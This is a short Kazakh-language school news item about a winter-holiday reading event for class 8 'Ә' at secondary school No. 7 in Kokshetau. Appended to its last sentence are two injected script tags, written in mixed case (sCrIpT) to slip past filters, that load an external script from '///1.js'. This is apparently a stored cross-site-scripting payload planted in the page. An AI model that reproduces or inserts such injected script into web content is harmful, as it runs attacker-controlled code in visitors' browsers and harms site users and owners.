Оқушыларды қысқы каникул кезінде жұмыспен қамту жоспары аясында Көкшетау қаласындағы «No7 орта мектебі» КММ-нің 8 «Ә» сыныбында «Ләззатпен оқу» сыныптан тыс іс-шара өткізілді. Іс-шараның мақсаты: оқушылардың оқу сауаттылығы мен оқуға деген қызығушылығын дамыту, сондай-ақ олардың мәдени және ақпараттық құзыреттіліктерін арттыру. Тапсырмалар: кітап оқудың құндылығы мен маңызы туралы түсініктер қалыптастыру және кітап мәдениеті; оқымайтын және аз оқитын балаларды белсенді оқуға тарту, саналы оқу дағдыларын дамыту. Орыс тілі мен әдебиеті мұғалімі: Исетова Бақыт Қайратқызы.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>